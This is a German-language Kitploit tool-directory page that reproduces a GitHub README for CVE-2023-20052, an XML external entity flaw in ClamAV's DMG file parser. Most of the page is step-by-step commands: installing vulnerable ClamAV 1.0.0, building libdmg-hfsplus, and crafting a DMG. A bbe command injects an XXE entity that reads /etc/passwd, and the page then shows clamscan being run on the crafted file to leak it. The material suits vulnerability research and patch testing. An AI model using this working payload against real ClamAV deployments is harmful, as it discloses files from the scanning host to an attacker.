Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-20052 — CVE-2023-20052 Informationsleck-Schwachstelle im DMG-Dateiparser von ClamAV | Kitploit
Tools/GitHubGitHub/cy83rr0h1t/cve-2023-20052
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungMalware-Analyse
GitHubcy83rr0h1t/cve-2023-20052

CVE-2023-20052

CVE-2023-20052 Informationsleck-Schwachstelle im DMG-Dateiparser von ClamAV

Repository anzeigen
13vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-20052

CVE-2023-20052 – Schwachstelle mit Informationsleck im DMG-Dateiparser von ClamAV
Eine Schwachstelle im DMG-Dateiparser von ClamAV in den Versionen 1.0.0 und früher, 0.105.1 und früher sowie 0.103.7 und früher könnte es einem nicht authentifizierten, entfernten Angreifer ermöglichen, auf vertrauliche Informationen auf einem betroffenen Gerät zuzugreifen. Diese Schwachstelle ist auf die Aktivierung der XML-Entity-Substitution zurückzuführen, die zu einer XML-External-Entity-Injection führen kann. Ein Angreifer könnte diese Schwachstelle ausnutzen, indem er eine manipulierte DMG-Datei zur Überprüfung durch ClamAV auf einem betroffenen Gerät einreicht. Eine erfolgreiche Ausnutzung könnte es dem Angreifer ermöglichen, Bytes aus jeder Datei zu leaken, die vom ClamAV-Scanprozess gelesen werden kann.

Getestet unter Ubuntu 20.04

So installieren Sie ClamAV Version 1.0.0

  • https://github.com/Cisco-Talos/clamav/releases/download/clamav-1.0.0/clamav-1.0.0.linux.i686.deb
  • https://github.com/Cisco-Talos/clamav/releases/download/clamav-1.0.0/clamav-1.0.0.linux.x86_64.deb

sudo dpkg -i package-name.deb
1

  • sudo apt install -f

  • mkdir /usr/local/share/clamav

  • mv /usr/local/etc/freshclam.conf.sample /usr/local/etc/freshclam.conf
    2

  • sudo adduser clamav
    3

  • sudo chown -R 1002:1003 /usr/local/share/clamav

  • sudo freshclam
    4

5

  • clamscan --version
    6

Installation einiger weiterer für diesen Exploit erforderlicher Komponenten.

  • apt-get update

  • apt-get install -y ca-certificates gnupg wget

  • echo "deb http://archive.debian.org/debian-security stretch/updates main" >> /etc/apt/sources.list

  • wget -q -O - https://ftp-master.debian.org/keys/archive-key-9-security.asc | apt-key add -

  • apt-get update -y

  • sudo apt install -y libssl1.0-dev gcc g++ cmake zlib1g-dev genisoimage bbe git hfsplus
    7

  • git clone https://github.com/planetbeing/libdmg-hfsplus.git
    8

  • cd /libdmg-hfsplus

  • cmake .
    9

  • make
    10

  • cp dmg/dmg /bin
    sudo genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
    11

bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit2.dmg 12

  • clamscan --debug exploit2.dmg 13

Referenz: https://github.com/nokn0wthing/CVE-2023-20052

Tool herunterladen